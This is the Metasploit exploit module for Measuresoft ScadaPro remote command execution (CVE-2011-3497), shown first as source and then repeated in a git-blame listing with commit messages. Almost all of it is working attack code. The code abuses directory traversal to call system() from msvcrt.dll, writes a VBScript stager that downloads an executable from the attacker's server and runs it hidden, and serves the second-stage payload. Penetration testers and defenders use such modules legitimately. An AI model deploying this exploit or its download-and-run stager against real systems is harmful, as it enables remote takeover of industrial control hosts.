modules/exploits/windows/scada/scadapro_cmdexe.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Measuresoft ScadaPro Remote Command Execution',
      'Description'    => %q{
        This module allows remote attackers to execute arbitrary commands on the
        affected system by abusing via Directory Traversal attack when using the
        'xf' command (execute function). An attacker can execute system() from
        msvcrt.dll to upload a backdoor and gain remote code execution. This
        vulnerability affects version 4.0.0 and earlier.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma',                           # Initial discovery/poc
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf
          'TecR0c <tecr0c[at]tecninja.net>',          # msf
        ],
      'References'     =>
        [
          [ 'CVE', '2011-3497'],
          [ 'OSVDB', '75490'],
          [ 'BID', '49613'],
          [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
          [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
          # seemed pretty accurate to us ;)
          [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
        ],
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # truly universal
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 16 2011'))

      register_options(
      [
        Opt::RPORT(11234),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
      ])
  end

  # couldn't generate a vbs or exe payload and then use the wF command
  # as there is a limit to the amount of data to write to disk.
  # so we just write out a vbs script like the old days.

  def build_vbs(url, stager_name)
    name_xmlhttp = rand_text_alpha(2)
    name_adodb   = rand_text_alpha(2)

    tmp = "#{@temp_folder}/#{stager_name}"

    vbs  = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
    vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
    vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
    vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
    vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
    vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
    vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"

    return vbs
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.exe/
      print_status("Sending 2nd stage payload")
      return if ((p=regenerate_payload(cli)) == nil)
      data = generate_payload_exe( {:code=>p.encoded} )
      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
      return
    end
  end

  def exploit
    # In order to save binary data to the file system the payload is written to a .vbs
    # file and execute it from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder  = "C:/Windows/Temp"

    if datastore['SRVHOST'] == '0.0.0.0'
      lhost = Rex::Socket.source_address('50.50.50.50')
    else
      lhost = datastore['SRVHOST']
    end

    payload_src  = lhost
    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

    stager_name = rand_text_alpha(6) + ".vbs"
    stager      = build_vbs(payload_src, stager_name)

    path = "..\\..\\..\\..\\..\\windows\\system32"

    createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
    download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"

    print_status("Sending 1st stage payload...")

    connect
    sock.get_once()
    sock.put(createvbs)
    sock.get_once()
    sock.put(download_execute)
    handler()
    disconnect

    super
  end
end
A handful of rankings changes, also converting whitespace. 2011-10-15 22:58:20 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
A handful of rankings changes, also converting whitespace. 2011-10-15 22:58:20 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpServer::HTML`
			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::EXE`

			`def initialize(info = {})`
			`super(update_info(info,`
Add last chunk of fixes 2014-03-11 12:44:34 -05:00			`'Name' => 'Measuresoft ScadaPro Remote Command Execution',`
Retab modules 2013-08-30 16:28:54 -05:00			`'Description' => %q{`
80 pages left 2017-09-13 22:03:34 -04:00			`This module allows remote attackers to execute arbitrary commands on the`
Add last chunk of fixes 2014-03-11 12:44:34 -05:00			`affected system by abusing via Directory Traversal attack when using the`
			`'xf' command (execute function). An attacker can execute system() from`
			`msvcrt.dll to upload a backdoor and gain remote code execution. This`
			`vulnerability affects version 4.0.0 and earlier.`
Retab modules 2013-08-30 16:28:54 -05:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Luigi Auriemma', # Initial discovery/poc`
			`'mr_me <steventhomasseeley[at]gmail.com>', # msf`
			`'TecR0c <tecr0c[at]tecninja.net>', # msf`
			`],`
			`'References' =>`
			`[`
			`[ 'CVE', '2011-3497'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '75490'],`
Retab modules 2013-08-30 16:28:54 -05:00			`[ 'BID', '49613'],`
			`[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],`
			`[ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],`
			`# seemed pretty accurate to us ;)`
			`[ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],`
			`],`
			`'DefaultOptions' =>`
			`{`
Fix #8002 , Use post/windows/manage/priv_migrate instead of migrate -f 2017-02-23 17:04:36 -06:00			`'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',`
Retab modules 2013-08-30 16:28:54 -05:00			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`# truly universal`
			`[ 'Automatic', { } ],`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Sep 16 2011'))`

			`register_options(`
			`[`
			`Opt::RPORT(11234),`
			`OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`

			`# couldn't generate a vbs or exe payload and then use the wF command`
			`# as there is a limit to the amount of data to write to disk.`
			`# so we just write out a vbs script like the old days.`

			`def build_vbs(url, stager_name)`
			`name_xmlhttp = rand_text_alpha(2)`
			`name_adodb = rand_text_alpha(2)`

			`tmp = "#{@temp_folder}/#{stager_name}"`

			`vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "`
			`vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"`
			`vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "`
			`vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "`
			`vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "`
			`vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "`
			`vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"`

			`return vbs`
			`end`

			`def on_request_uri(cli, request)`
			`if request.uri =~ /\.exe/`
			`print_status("Sending 2nd stage payload")`
			`return if ((p=regenerate_payload(cli)) == nil)`
			`data = generate_payload_exe( {:code=>p.encoded} )`
			`send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )`
			`return`
			`end`
			`end`

			`def exploit`
			`# In order to save binary data to the file system the payload is written to a .vbs`
			`# file and execute it from there.`
			`@payload_name = rand_text_alpha(4)`
			`@temp_folder = "C:/Windows/Temp"`

			`if datastore['SRVHOST'] == '0.0.0.0'`
			`lhost = Rex::Socket.source_address('50.50.50.50')`
			`else`
			`lhost = datastore['SRVHOST']`
			`end`

			`payload_src = lhost`
Fix scadapro_cmdexe datastore 2015-02-05 02:02:52 -06:00			`payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"`
Retab modules 2013-08-30 16:28:54 -05:00
			`stager_name = rand_text_alpha(6) + ".vbs"`
			`stager = build_vbs(payload_src, stager_name)`

			`path = "..\\..\\..\\..\\..\\windows\\system32"`

			`createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"`
			`download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"`

			`print_status("Sending 1st stage payload...")`

			`connect`
			`sock.get_once()`
			`sock.put(createvbs)`
			`sock.get_once()`
			`sock.put(download_execute)`
			`handler()`
			`disconnect`

			`super`
			`end`
A handful of rankings changes, also converting whitespace. 2011-10-15 22:58:20 +00:00			`end`